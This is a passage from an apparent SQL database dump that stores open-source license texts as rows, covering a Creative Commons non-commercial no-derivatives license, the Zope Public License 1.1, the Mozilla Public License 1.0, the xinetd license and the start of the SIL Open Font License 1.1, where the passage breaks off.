work, the\nindividual, individuals, entity or entities who created the Work or if no\nindividual or entity can be identified, the publisher; and in addition (i)\nin the case of a performance the actors, singers, musicians, dancers, and\nother persons who act, sing, deliver, declaim, play in, interpret or otherwise\nperform literary or artistic works or expressions of folklore; (ii) in the\ncase of a phonogram the producer being the person or legal entity who first\nfixes the sounds of a performance or other sounds; and, (iii) in the case\nof broadcasts, the organization that transmits the broadcast.\n\nf. \"Work\" means the literary and/or artistic work offered under the terms\nof this License including without limitation any production in the literary,\nscientific and artistic domain, whatever may be the mode or form of its expression\nincluding digital form, such as a book, pamphlet and other writing; a lecture,\naddress, sermon or other work of the same nature; a dramatic or dramatico-musical\nwork; a choreographic work or entertainment in dumb show; a musical composition\nwith or without words; a cinematographic work to which are assimilated works\nexpressed by a process analogous to cinematography; a work of drawing, painting,\narchitecture, sculpture, engraving or lithography; a photographic work to\nwhich are assimilated works expressed by a process analogous to photography;\na work of applied art; an illustration, map, plan, sketch or three-dimensional\nwork relative to geography, topography, architecture or science; a performance;\na broadcast; a phonogram; a compilation of data to the extent it is protected\nas a copyrightable work; or a work performed by a variety or circus performer\nto the extent it is not otherwise considered a literary or artistic work.\n\ng. \"You\" means an individual or entity exercising rights under this License\nwho has not previously violated the terms of this License with respect to\nthe Work, or who has received express permission from the Licensor to exercise\nrights under this License despite a previous violation.\n\nh. \"Publicly Perform\" means to perform public recitations of the Work and\nto communicate to the public those public recitations, by any means or process,\nincluding by wire or wireless means or public digital performances; to make\navailable to the public Works in such a way that members of the public may\naccess these Works from a place and at a place individually chosen by them;\nto perform the Work to the public by any means or process and the communication\nto the public of the performances of the Work, including by public digital\nperformance; to broadcast and rebroadcast the Work by any means including\nsigns, sounds or images.\n\ni. \"Reproduce\" means to make copies of the Work by any means including without\nlimitation by sound or visual recordings and the right of fixation and reproducing\nfixations of the Work, including storage of a protected performance or phonogram\nin digital form or other electronic medium.\n\n2. Fair Dealing Rights. Nothing in this License is intended to reduce, limit,\nor restrict any uses free from copyright or rights arising from limitations\nor exceptions that are provided for in connection with the copyright protection\nunder copyright law or other applicable laws.\n\n3. License Grant. Subject to the terms and conditions of this License, Licensor\nhereby grants You a worldwide, royalty-free, non-exclusive, perpetual (for\nthe duration of the applicable copyright) license to exercise the rights in\nthe Work as stated below:\n\na. to Reproduce the Work, to incorporate the Work into one or more Collections,\nand to Reproduce the Work as incorporated in the Collections; and,\n\nb. to Distribute and Publicly Perform the Work including as incorporated in\nCollections.\n\nThe above rights may be exercised in all media and formats whether now known\nor hereafter devised. The above rights include the right to make such modifications\nas are technically necessary to exercise the rights in other media and formats,\nbut otherwise you have no rights to make Adaptations. Subject to 8(f), all\nrights not expressly granted by Licensor are hereby reserved, including but\nnot limited to the rights set forth in Section 4(d).\n\n4. Restrictions. The license granted in Section 3 above is expressly made\nsubject to and limited by the following restrictions:\n\na. You may Distribute or Publicly Perform the Work only under the terms of\nthis License. You must include a copy of, or the Uniform Resource Identifier\n(URI) for, this License with every copy of the Work You Distribute or Publicly\nPerform. You may not offer or impose any terms on the Work that restrict the\nterms of this License or the ability of the recipient of the Work to exercise\nthe rights granted to that recipient under the terms of the License. You may\nnot sublicense the Work. You must keep intact all notices that refer to this\nLicense and to the disclaimer of warranties with every copy of the Work You\nDistribute or Publicly Perform. When You Distribute or Publicly Perform the\nWork, You may not impose any effective technological measures on the Work\nthat restrict the ability of a recipient of the Work from You to exercise\nthe rights granted to that recipient under the terms of the License. This\nSection 4(a) applies to the Work as incorporated in a Collection, but this\ndoes not require the Collection apart from the Work itself to be made subject\nto the terms of this License. If You create a Collection, upon notice from\nany Licensor You must, to the extent practicable, remove from the Collection\nany credit as required by Section 4(c), as requested.\n\nb. You may not exercise any of the rights granted to You in Section 3 above\nin any manner that is primarily intended for or directed toward commercial\nadvantage or private monetary compensation. The exchange of the Work for other\ncopyrighted works by means of digital file-sharing or otherwise shall not\nbe considered to be intended for or directed toward commercial advantage or\nprivate monetary compensation, provided there is no payment of any monetary\ncompensation in connection with the exchange of copyrighted works.\n\nc. If You Distribute, or Publicly Perform the Work or Collections, You must,\nunless a request has been made pursuant to Section 4(a), keep intact all copyright\nnotices for the Work and provide, reasonable to the medium or means You are\nutilizing: (i) the name of the Original Author (or pseudonym, if applicable)\nif supplied, and/or if the Original Author and/or Licensor designate another\nparty or parties (e.g., a sponsor institute, publishing entity, journal) for\nattribution (\"Attribution Parties\") in Licensor\'s copyright notice, terms\nof service or by other reasonable means, the name of such party or parties;\n(ii) the title of the Work if supplied; (iii) to the extent reasonably practicable,\nthe URI, if any, that Licensor specifies to be associated with the Work, unless\nsuch URI does not refer to the copyright notice or licensing information for\nthe Work. The credit required by this Section 4(c) may be implemented in any\nreasonable manner; provided, however, that in the case of a Collection, at\na minimum such credit will appear, if a credit for all contributing authors\nof Collection appears, then as part of these credits and in a manner at least\nas prominent as the credits for the other contributing authors. For the avoidance\nof doubt, You may only use the credit required by this Section for the purpose\nof attribution in the manner set out above and, by exercising Your rights\nunder this License, You may not implicitly or explicitly assert or imply any\nconnection with, sponsorship or endorsement by the Original Author, Licensor\nand/or Attribution Parties, as appropriate, of You or Your use of the Work,\nwithout the separate, express prior written permission of the Original Author,\nLicensor and/or Attribution Parties.\n\n d. For the avoidance of doubt:\n\ni. Non-waivable Compulsory License Schemes. In those jurisdictions in which\nthe right to collect royalties through any statutory or compulsory licensing\nscheme cannot be waived, the Licensor reserves the exclusive right to collect\nsuch royalties for any exercise by You of the rights granted under this License;\n\nii. Waivable Compulsory License Schemes. In those jurisdictions in which the\nright to collect royalties through any statutory or compulsory licensing scheme\ncan be waived, the Licensor reserves the exclusive right to collect such royalties\nfor any exercise by You of the rights granted under this License if Your exercise\nof such rights is for a purpose or use which is otherwise than noncommercial\nas permitted under Section 4(b) and otherwise waives the right to collect\nroyalties through any statutory or compulsory licensing scheme; and,\n\niii. Voluntary License Schemes. The Licensor reserves the right to collect\nroyalties, whether individually or, in the event that the Licensor is a member\nof a collecting society that administers voluntary licensing schemes, via\nthat society, from any exercise by You of the rights granted under this License\nthat is for a purpose or use which is otherwise than noncommercial as permitted\nunder Section 4(b).\n\ne. Except as otherwise agreed in writing by the Licensor or as may be otherwise\npermitted by applicable law, if You Reproduce, Distribute or Publicly Perform\nthe Work either by itself or as part of any Collections, You must not distort,\nmutilate, modify or take other derogatory action in relation to the Work which\nwould be prejudicial to the Original Author\'s honor or reputation.\n\n 5. Representations, Warranties and Disclaimer\n\nUNLESS OTHERWISE MUTUALLY AGREED BY THE PARTIES IN WRITING, LICENSOR OFFERS\nTHE WORK AS-IS AND MAKES NO REPRESENTATIONS OR WARRANTIES OF ANY KIND CONCERNING\nTHE WORK, EXPRESS, IMPLIED, STATUTORY OR OTHERWISE, INCLUDING, WITHOUT LIMITATION,\nWARRANTIES OF TITLE, MERCHANTIBILITY, FITNESS FOR A PARTICULAR PURPOSE, NONINFRINGEMENT,\nOR THE ABSENCE OF LATENT OR OTHER DEFECTS, ACCURACY, OR THE PRESENCE OF ABSENCE\nOF ERRORS, WHETHER OR NOT DISCOVERABLE. SOME JURISDICTIONS DO NOT ALLOW THE\nEXCLUSION OF IMPLIED WARRANTIES, SO SUCH EXCLUSION MAY NOT APPLY TO YOU.\n\n6. Limitation on Liability. EXCEPT TO THE EXTENT REQUIRED BY APPLICABLE LAW,\nIN NO EVENT WILL LICENSOR BE LIABLE TO YOU ON ANY LEGAL THEORY FOR ANY SPECIAL,\nINCIDENTAL, CONSEQUENTIAL, PUNITIVE OR EXEMPLARY DAMAGES ARISING OUT OF THIS\nLICENSE OR THE USE OF THE WORK, EVEN IF LICENSOR HAS BEEN ADVISED OF THE POSSIBILITY\nOF SUCH DAMAGES.\n\n 7. Termination\n\na. This License and the rights granted hereunder will terminate automatically\nupon any breach by You of the terms of this License. Individuals or entities\nwho have received Collections from You under this License, however, will not\nhave their licenses terminated provided such individuals or entities remain\nin full compliance with those licenses. Sections 1, 2, 5, 6, 7, and 8 will\nsurvive any termination of this License.\n\nb. Subject to the above terms and conditions, the license granted here is\nperpetual (for the duration of the applicable copyright in the Work). Notwithstanding\nthe above, Licensor reserves the right to release the Work under different\nlicense terms or to stop distributing the Work at any time; provided, however\nthat any such election will not serve to withdraw this License (or any other\nlicense that has been, or is required to be, granted under the terms of this\nLicense), and this License will continue in full force and effect unless terminated\nas stated above.\n\n 8. Miscellaneous\n\na. Each time You Distribute or Publicly Perform the Work or a Collection,\nthe Licensor offers to the recipient a license to the Work on the same terms\nand conditions as the license granted to You under this License.\n\nb. If any provision of this License is invalid or unenforceable under applicable\nlaw, it shall not affect the validity or enforceability of the remainder of\nthe terms of this License, and without further action by the parties to this\nagreement, such provision shall be reformed to the minimum extent necessary\nto make such provision valid and enforceable.\n\nc. No term or provision of this License shall be deemed waived and no breach\nconsented to unless such waiver or consent shall be in writing and signed\nby the party to be charged with such waiver or consent.\n\nd. This License constitutes the entire agreement between the parties with\nrespect to the Work licensed here. There are no understandings, agreements\nor representations with respect to the Work not specified here. Licensor shall\nnot be bound by any additional provisions that may appear in any communication\nfrom You. This License may not be modified without the mutual written agreement\nof the Licensor and You.\n\ne. The rights granted under, and the subject matter referenced, in this License\nwere drafted utilizing the terminology of the Berne Convention for the Protection\nof Literary and Artistic Works (as amended on September 28, 1979), the Rome\nConvention of 1961, the WIPO Copyright Treaty of 1996, the WIPO Performances\nand Phonograms Treaty of 1996 and the Universal Copyright Convention (as revised\non July 24, 1971). These rights and subject matter take effect in the relevant\njurisdiction in which the License terms are sought to be enforced according\nto the corresponding provisions of the implementation of those treaty provisions\nin the applicable national law. If the standard suite of rights granted under\napplicable copyright law includes additional rights not granted under this\nLicense, such additional rights are deemed to be included in the License;\nthis License is not intended to restrict the license of any rights under applicable\nlaw.\n\nCreative Commons Notice\n\nCreative Commons is not a party to this License, and makes no warranty whatsoever\nin connection with the Work. Creative Commons will not be liable to You or\nany party on any legal theory for any damages whatsoever, including without\nlimitation any general, special, incidental or consequential damages arising\nin connection to this license. Notwithstanding the foregoing two (2) sentences,\nif Creative Commons has expressly identified itself as the Licensor hereunder,\nit shall have all rights and obligations of Licensor.\n\nExcept for the limited purpose of indicating to the public that the Work is\nlicensed under the CCPL, Creative Commons does not authorize the use by either\nparty of the trademark \"Creative Commons\" or any related trademark or logo\nof Creative Commons without the prior written consent of Creative Commons.\nAny permitted use will be in compliance with Creative Commons\' then-current\ntrademark usage guidelines, as may be published on its website or otherwise\nmade available upon request from time to time. For the avoidance of doubt,\nthis trademark restriction does not form part of this License.\n\nCreative Commons may be contacted at http://creativecommons.org/.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(159,'ZPL-1.1','Zope Public License (ZPL) Version 1.1\n\nCopyright (c) Zope Corporation. All rights reserved. This license has been\ncertified as open source.\n\nRedistribution and use in source and binary forms, with or without modification,\nare permitted provided that the following conditions are met:\n\n1. Redistributions in source code must retain the above copyright notice,\nthis list of conditions, and the following disclaimer.\n\n2. Redistributions in binary form must reproduce the above copyright notice,\nthis list of conditions, and the following disclaimer in the documentation\nand/or other materials provided with the distribution.\n\n3. All advertising materials and documentation mentioning features derived\nfrom or use of this software must display the following acknowledgement:\n\n\"This product includes software developed by Zope Corporation for use in the\nZ Object Publishing Environment (http://www.zope.com/).\"\n\nIn the event that the product being advertised includes an intact Zope distribution\n(with copyright and license included) then this clause is waived.\n\n4. Names associated with Zope or Zope Corporation must not be used to endorse\nor promote products derived from this software without prior written permission\nfrom Zope Corporation.\n\n5. Modified redistributions of any form whatsoever must retain the following\nacknowledgment:\n\n\"This product includes software developed by Zope Corporation for use in the\nZ Object Publishing Environment (http://www.zope.com/).\"\n\nIntact (re-)distributions of any official Zope release do not require an external\nacknowledgement.\n\n6. Modifications are encouraged but must be packaged separately as patches\nto official Zope releases. Distributions that do not clearly separate the\npatches from the original work must be clearly labeled as unofficial distributions.\nModifications which do not carry the name Zope may be packaged in any form,\nas long as they conform to all of the clauses above.\n\nDisclaimer\n\nTHIS SOFTWARE IS PROVIDED BY ZOPE CORPORATION ``AS IS\'\' AND ANY EXPRESSED\nOR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES\nOF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN\nNO EVENT SHALL ZOPE CORPORATION OR ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT,\nINDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,\nBUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,\nDATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY\nOF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\nOR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF\nADVISED OF THE POSSIBILITY OF SUCH DAMAGE. This software consists of contributions\nmade by Zope Corporation and many individuals on behalf of Zope Corporation.\nSpecific attributions are listed in the accompanying credits file.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(160,'MPL-1.0','MOZILLA PUBLIC LICENSE\n\nVersion 1.0\n\n 1. Definitions.\n\n1.1. \"Contributor\" means each entity that creates or contributes to the creation\nof Modifications.\n\n1.2. \"Contributor Version\" means the combination of the Original Code, prior\nModifications used by a Contributor, and the Modifications made by that particular\nContributor.\n\n1.3. \"Covered Code\" means the Original Code or Modifications or the combination\nof the Original Code and Modifications, in each case including portions thereof.\n\n1.4. \"Electronic Distribution Mechanism\" means a mechanism generally accepted\nin the software development community for the electronic transfer of data.\n\n 1.5. \"Executable\" means Covered Code in any form other than Source Code.\n\n1.6. \"Initial Developer\" means the individual or entity identified as the\nInitial Developer in the Source Code notice required by Exhibit A.\n\n1.7. \"Larger Work\" means a work which combines Covered Code or portions thereof\nwith code not governed by the terms of this License.\n\n 1.8. \"License\" means this document.\n\n1.9. \"Modifications\" means any addition to or deletion from the substance\nor structure of either the Original Code or any previous Modifications. When\nCovered Code is released as a series of files, a Modification is:\n\nA. Any addition to or deletion from the contents of a file containing Original\nCode or previous Modifications.\n\nB. Any new file that contains any part of the Original Code or previous Modifications.\n\n1.10. \"Original Code\" means Source Code of computer software code which is\ndescribed in the Source Code notice required by Exhibit A as Original Code,\nand which, at the time of its release under this License is not already Covered\nCode governed by this License.\n\n1.11. \"Source Code\" means the preferred form of the Covered Code for making\nmodifications to it, including all modules it contains, plus any associated\ninterface definition files, scripts used to control compilation and installation\nof an Executable, or a list of source code differential comparisons against\neither the Original Code or another well known, available Covered Code of\nthe Contributor\'s choice. The Source Code can be in a compressed or archival\nform, provided the appropriate decompression or de-archiving software is widely\navailable for no charge.\n\n1.12. \"You\" means an individual or a legal entity exercising rights under,\nand complying with all of the terms of, this License or a future version of\nthis License issued under Section 6.1. For legal entities, \"You\" includes\nany entity which controls, is controlled by, or is under common control with\nYou. For purposes of this definition, \"control\" means (a) the power, direct\nor indirect, to cause the direction or management of such entity, whether\nby contract or otherwise, or (b) ownership of fifty percent (50%) or more\nof the outstanding shares or beneficial ownership of such entity.\n\n 2. Source Code License.\n\n 2.1. The Initial Developer Grant.\n\nThe Initial Developer hereby grants You a world-wide, royalty-free, non-exclusive\nlicense, subject to third party intellectual property claims:\n\n(a) to use, reproduce, modify, display, perform, sublicense and distribute\nthe Original Code (or portions thereof) with or without Modifications, or\nas part of a Larger Work; and\n\n(b) under patents now or hereafter owned or controlled by Initial Developer,\nto make, have made, use and sell (\"Utilize\") the Original Code (or portions\nthereof), but solely to the extent that any such patent is reasonably necessary\nto enable You to Utilize the Original Code (or portions thereof) and not to\nany greater extent that may be necessary to Utilize further Modifications\nor combinations.\n\n 2.2. Contributor Grant.\n\nEach Contributor hereby grants You a world-wide, royalty-free, non-exclusive\nlicense, subject to third party intellectual property claims:\n\n(a) to use, reproduce, modify, display, perform, sublicense and distribute\nthe Modifications created by such Contributor (or portions thereof) either\non an unmodified basis, with other Modifications, as Covered Code or as part\nof a Larger Work; and\n\n(b) under patents now or hereafter owned or controlled by Contributor, to\nUtilize the Contributor Version (or portions thereof), but solely to the extent\nthat any such patent is reasonably necessary to enable You to Utilize the\nContributor Version (or portions thereof), and not to any greater extent that\nmay be necessary to Utilize further Modifications or combinations.\n\n 3. Distribution Obligations.\n\n 3.1. Application of License.\n\nThe Modifications which You create or to which You contribute are governed\nby the terms of this License, including without limitation Section 2.2. The\nSource Code version of Covered Code may be distributed only under the terms\nof this License or a future version of this License released under Section\n6.1, and You must include a copy of this License with every copy of the Source\nCode You distribute. You may not offer or impose any terms on any Source Code\nversion that alters or restricts the applicable version of this License or\nthe recipients\' rights hereunder. However, You may include an additional document\noffering the additional rights described in Section 3.5.\n\n 3.2. Availability of Source Code.\n\nAny Modification which You create or to which You contribute must be made\navailable in Source Code form under the terms of this License either on the\nsame media as an Executable version or via an accepted Electronic Distribution\nMechanism to anyone to whom you made an Executable version available; and\nif made available via Electronic Distribution Mechanism, must remain available\nfor at least twelve (12) months after the date it initially became available,\nor at least six (6) months after a subsequent version of that particular Modification\nhas been made available to such recipients. You are responsible for ensuring\nthat the Source Code version remains available even if the Electronic Distribution\nMechanism is maintained by a third party.\n\n 3.3. Description of Modifications.\n\nYou must cause all Covered Code to which you contribute to contain a file\ndocumenting the changes You made to create that Covered Code and the date\nof any change. You must include a prominent statement that the Modification\nis derived, directly or indirectly, from Original Code provided by the Initial\nDeveloper and including the name of the Initial Developer in (a) the Source\nCode, and (b) in any notice in an Executable version or related documentation\nin which You describe the origin or ownership of the Covered Code.\n\n 3.4. Intellectual Property Matters\n\n (a) Third Party Claims.\n\nIf You have knowledge that a party claims an intellectual property right in\nparticular functionality or code (or its utilization under this License),\nyou must include a text file with the source code distribution titled \"LEGAL\"\nwhich describes the claim and the party making the claim in sufficient detail\nthat a recipient will know whom to contact. If you obtain such knowledge after\nYou make Your Modification available as described in Section 3.2, You shall\npromptly modify the LEGAL file in all copies You make available thereafter\nand shall take other steps (such as notifying appropriate mailing lists or\nnewsgroups) reasonably calculated to inform those who received the Covered\nCode that new knowledge has been obtained.\n\n (b) Contributor APIs.\n\nIf Your Modification is an application programming interface and You own or\ncontrol patents which are reasonably necessary to implement that API, you\nmust also include this information in the LEGAL file.\n\n 3.5. Required Notices.\n\nYou must duplicate the notice in Exhibit A in each file of the Source Code,\nand this License in any documentation for the Source Code, where You describe\nrecipients\' rights relating to Covered Code. If You created one or more Modification(s),\nYou may add your name as a Contributor to the notice described in Exhibit\nA. If it is not possible to put such notice in a particular Source Code file\ndue to its structure, then you must include such notice in a location (such\nas a relevant directory file) where a user would be likely to look for such\na notice. You may choose to offer, and to charge a fee for, warranty, support,\nindemnity or liability obligations to one or more recipients of Covered Code.\nHowever, You may do so only on Your own behalf, and not on behalf of the Initial\nDeveloper or any Contributor. You must make it absolutely clear than any such\nwarranty, support, indemnity or liability obligation is offered by You alone,\nand You hereby agree to indemnify the Initial Developer and every Contributor\nfor any liability incurred by the Initial Developer or such Contributor as\na result of warranty, support, indemnity or liability terms You offer.\n\n 3.6. Distribution of Executable Versions.\n\nYou may distribute Covered Code in Executable form only if the requirements\nof Section 3.1-3.5 have been met for that Covered Code, and if You include\na notice stating that the Source Code version of the Covered Code is available\nunder the terms of this License, including a description of how and where\nYou have fulfilled the obligations of Section 3.2. The notice must be conspicuously\nincluded in any notice in an Executable version, related documentation or\ncollateral in which You describe recipients\' rights relating to the Covered\nCode. You may distribute the Executable version of Covered Code under a license\nof Your choice, which may contain terms different from this License, provided\nthat You are in compliance with the terms of this License and that the license\nfor the Executable version does not attempt to limit or alter the recipient\'s\nrights in the Source Code version from the rights set forth in this License.\nIf You distribute the Executable version under a different license You must\nmake it absolutely clear that any terms which differ from this License are\noffered by You alone, not by the Initial Developer or any Contributor. You\nhereby agree to indemnify the Initial Developer and every Contributor for\nany liability incurred by the Initial Developer or such Contributor as a result\nof any such terms You offer.\n\n 3.7. Larger Works.\n\nYou may create a Larger Work by combining Covered Code with other code not\ngoverned by the terms of this License and distribute the Larger Work as a\nsingle product. In such a case, You must make sure the requirements of this\nLicense are fulfilled for the Covered Code.\n\n 4. Inability to Comply Due to Statute or Regulation.\n\nIf it is impossible for You to comply with any of the terms of this License\nwith respect to some or all of the Covered Code due to statute or regulation\nthen You must: (a) comply with the terms of this License to the maximum extent\npossible; and (b) describe the limitations and the code they affect. Such\ndescription must be included in the LEGAL file described in Section 3.4 and\nmust be included with all distributions of the Source Code. Except to the\nextent prohibited by statute or regulation, such description must be sufficiently\ndetailed for a recipient of ordinary skill to be able to understand it.\n\n 5. Application of this License.\n\nThis License applies to code to which the Initial Developer has attached the\nnotice in Exhibit A, and to related Covered Code.\n\n 6. Versions of the License.\n\n 6.1. New Versions.\n\nNetscape Communications Corporation (\"Netscape\") may publish revised and/or\nnew versions of the License from time to time. Each version will be given\na distinguishing version number.\n\n 6.2. Effect of New Versions.\n\nOnce Covered Code has been published under a particular version of the License,\nYou may always continue to use it under the terms of that version. You may\nalso choose to use such Covered Code under the terms of any subsequent version\nof the License published by Netscape. No one other than Netscape has the right\nto modify the terms applicable to Covered Code created under this License.\n\n 6.3. Derivative Works.\n\nIf you create or use a modified version of this License (which you may only\ndo in order to apply it to code which is not already Covered Code governed\nby this License), you must (a) rename Your license so that the phrases \"Mozilla\",\n\"MOZILLAPL\", \"MOZPL\", \"Netscape\", \"NPL\" or any confusingly similar phrase\ndo not appear anywhere in your license and (b) otherwise make it clear that\nyour version of the license contains terms which differ from the Mozilla Public\nLicense and Netscape Public License. (Filling in the name of the Initial Developer,\nOriginal Code or Contributor in the notice described in Exhibit A shall not\nof themselves be deemed to be modifications of this License.)\n\n 7. DISCLAIMER OF WARRANTY.\n\nCOVERED CODE IS PROVIDED UNDER THIS LICENSE ON AN \"AS IS\" BASIS, WITHOUT WARRANTY\nOF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, WITHOUT LIMITATION, WARRANTIES\nTHAT THE COVERED CODE IS FREE OF DEFECTS, MERCHANTABLE, FIT FOR A PARTICULAR\nPURPOSE OR NON-INFRINGING. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE\nOF THE COVERED CODE IS WITH YOU. SHOULD ANY COVERED CODE PROVE DEFECTIVE IN\nANY RESPECT, YOU (NOT THE INITIAL DEVELOPER OR ANY OTHER CONTRIBUTOR) ASSUME\nTHE COST OF ANY NECESSARY SERVICING, REPAIR OR CORRECTION. THIS DISCLAIMER\nOF WARRANTY CONSTITUTES AN ESSENTIAL PART OF THIS LICENSE. NO USE OF ANY COVERED\nCODE IS AUTHORIZED HEREUNDER EXCEPT UNDER THIS DISCLAIMER.\n\n 8. TERMINATION.\n\nThis License and the rights granted hereunder will terminate automatically\nif You fail to comply with terms herein and fail to cure such breach within\n30 days of becoming aware of the breach. All sublicenses to the Covered Code\nwhich are properly granted shall survive any termination of this License.\nProvisions which, by their nature, must remain in effect beyond the termination\nof this License shall survive.\n\n 9. LIMITATION OF LIABILITY.\n\nUNDER NO CIRCUMSTANCES AND UNDER NO LEGAL THEORY, WHETHER TORT (INCLUDING\nNEGLIGENCE), CONTRACT, OR OTHERWISE, SHALL THE INITIAL DEVELOPER, ANY OTHER\nCONTRIBUTOR, OR ANY DISTRIBUTOR OF COVERED CODE, OR ANY SUPPLIER OF ANY OF\nSUCH PARTIES, BE LIABLE TO YOU OR ANY OTHER PERSON FOR ANY INDIRECT, SPECIAL,\nINCIDENTAL, OR CONSEQUENTIAL DAMAGES OF ANY CHARACTER INCLUDING, WITHOUT LIMITATION,\nDAMAGES FOR LOSS OF GOODWILL, WORK STOPPAGE, COMPUTER FAILURE OR MALFUNCTION,\nOR ANY AND ALL OTHER COMMERCIAL DAMAGES OR LOSSES, EVEN IF SUCH PARTY SHALL\nHAVE BEEN INFORMED OF THE POSSIBILITY OF SUCH DAMAGES. THIS LIMITATION OF\nLIABILITY SHALL NOT APPLY TO LIABILITY FOR DEATH OR PERSONAL INJURY RESULTING\nFROM SUCH PARTY\'S NEGLIGENCE TO THE EXTENT APPLICABLE LAW PROHIBITS SUCH LIMITATION.\nSOME JURISDICTIONS DO NOT ALLOW THE EXCLUSION OR LIMITATION OF INCIDENTAL\nOR CONSEQUENTIAL DAMAGES, SO THAT EXCLUSION AND LIMITATION MAY NOT APPLY TO\nYOU.\n\n 10. U.S. GOVERNMENT END USERS.\n\nThe Covered Code is a \"commercial item,\" as that term is defined in 48 C.F.R.\n2.101 (Oct. 1995), consisting of \"commercial computer software\" and \"commercial\ncomputer software documentation,\" as such terms are used in 48 C.F.R. 12.212\n(Sept. 1995). Consistent with 48 C.F.R. 12.212 and 48 C.F.R. 227.7202-1 through\n227.7202-4 (June 1995), all U.S. Government End Users acquire Covered Code\nwith only those rights set forth herein.\n\n 11. MISCELLANEOUS.\n\nThis License represents the complete agreement concerning subject matter hereof.\nIf any provision of this License is held to be unenforceable, such provision\nshall be reformed only to the extent necessary to make it enforceable. This\nLicense shall be governed by California law provisions (except to the extent\napplicable law, if any, provides otherwise), excluding its conflict-of-law\nprovisions. With respect to disputes in which at least one party is a citizen\nof, or an entity chartered or registered to do business in, the United States\nof America: (a) unless otherwise agreed in writing, all disputes relating\nto this License (excepting any dispute relating to intellectual property rights)\nshall be subject to final and binding arbitration, with the losing party paying\nall costs of arbitration; (b) any arbitration relating to this Agreement shall\nbe held in Santa Clara County, California, under the auspices of JAMS/EndDispute;\nand (c) any litigation relating to this Agreement shall be subject to the\njurisdiction of the Federal Courts of the Northern District of California,\nwith venue lying in Santa Clara County, California, with the losing party\nresponsible for costs, including without limitation, court costs and reasonable\nattorneys fees and expenses. The application of the United Nations Convention\non Contracts for the International Sale of Goods is expressly excluded. Any\nlaw or regulation which provides that the language of a contract shall be\nconstrued against the drafter shall not apply to this License.\n\n 12. RESPONSIBILITY FOR CLAIMS.\n\nExcept in cases where another Contributor has failed to comply with Section\n3.4, You are responsible for damages arising, directly or indirectly, out\nof Your utilization of rights under this License, based on the number of copies\nof Covered Code you made available, the revenues you received from utilizing\nsuch rights, and other relevant factors. You agree to work with affected parties\nto distribute responsibility on an equitable basis. EXHIBIT A.\n\n\" The contents of this file are subject to the Mozilla Public License Version\n1.0 (the \"License\"); you may not use this file except in compliance with the\nLicense. You may obtain a copy of the License at http://www.mozilla.org/MPL/\n\nSoftware distributed under the License is distributed on an \"AS IS\" basis,\nWITHOUT WARRANTY OF ANY KIND, either express or implied. See the License for\nthe specific language governing rights and limitations under the License.\n\nThe Original Code is _____ . The Initial Developer of the Original Code is\n_____ . Portions created by _____ are Copyright (C) _____ . All Rights Reserved.\nContributor(s): _____ . \"\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(161,'xinetd','ORIGINAL LICENSE: This software is\n\n(c) Copyright 1992 by Panagiotis Tsirigotis\n\nThe author (Panagiotis Tsirigotis) grants permission to use, copy, and distribute\nthis software and its documentation for any purpose and without fee, provided\nthat the above copyright notice extant in files in this distribution is not\nremoved from files included in any redistribution and that this copyright\nnotice is also included in any redistribution.\n\nModifications to this software may be distributed, either by distributing\nthe modified software or by distributing patches to the original software,\nunder the following additional terms:\n\n 1. The version number will be modified as follows:\n\na. The first 3 components of the version number (i.e <number>.<number>.<number>)\nwill remain unchanged.\n\nb. A new component will be appended to the version number to indicate the\nmodification level. The form of this component is up to the author of the\nmodifications.\n\n2. The author of the modifications will include his/her name by appending\nit along with the new version number to this file and will be responsible\nfor any wrong behavior of the modified software.\n\nThe author makes no representations about the suitability of this software\nfor any purpose. It is provided \"as is\" without any express or implied warranty.\n\nModifications: Version: 2.1.8.7-current Copyright 1998-2001 by Rob Braun\n\nSensor Addition Version: 2.1.8.9pre14a Copyright 2001 by Steve Grubb\n\nThis is an exerpt from an email I recieved from the original author, allowing\nxinetd as maintained by me (Rob Braun), to use the higher version numbers:\n\nI appreciate your maintaining the version string guidelines as specified in\nthe copyright. But I did not mean them to last as long as they did.\n\nSo, if you want, you may use any 2.N.* (N >= 3) version string for future\nxinetd versions that you release. Note that I am excluding the 2.2.* line;\nusing that would only create confusion. Naming the next release 2.3.0 would\nput to rest the confusion about 2.2.1 and 2.1.8.*.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(162,'OFL-1.1','Copyright (c) <dates>, <Copyright Holder> (<URL|email>),\n\nwith Reserved Font Name <Reserved Font Name>. This Font Software is licensed\nunder the SIL Open Font License, Version 1.1.\n\nThis license is copied below, and is also available with a FAQ at: http://scripts.sil.org/OFL\nSIL OPEN FONT LICENSE\n\nVersion 1.1 - 26 February 2007\n\nPREAMBLE\n\nThe goals of the Open Font License (OFL) are to stimulate worldwide development\nof collaborative font projects, to support the font creation efforts of academic\nand linguistic communities, and to provide a free and open framework in which\nfonts may be shared and improved in partnership with others.\n\nThe OFL allows the licensed fonts to be used, studied, modified and redistributed\nfreely as long as they are not sold by themselves. The fonts, including any\nderivative works, can be bundled, embedded, redistributed and/or sold with\nany software provided that any reserved names are not used by derivative works.\nThe fonts and derivatives, however, cannot be released under any other type\nof license. The requirement for fonts to remain under this license does not\napply to any document created using the fonts or their derivatives.\n\nDEFINITIONS\n\n\"Font Software\" refers to the set of files released by the Copyright Holder(s)\nunder this license and clearly marked as such. This may include source files,\nbuild scripts and documentation.\n\n\"Reserved Font Name\" refers to any names specified as such after the copyright\nstatement(s).\n\n\"Original Version\" refers to the collection of Font Software components as\ndistributed by the Copyright Holder(s).\n\n\"Modified Version\" refers to any derivative made by adding to, deleting, or\nsubstituting — in part or in whole — any of the components of the Original\nVersion, by changing formats or by porting the Font Software to a new 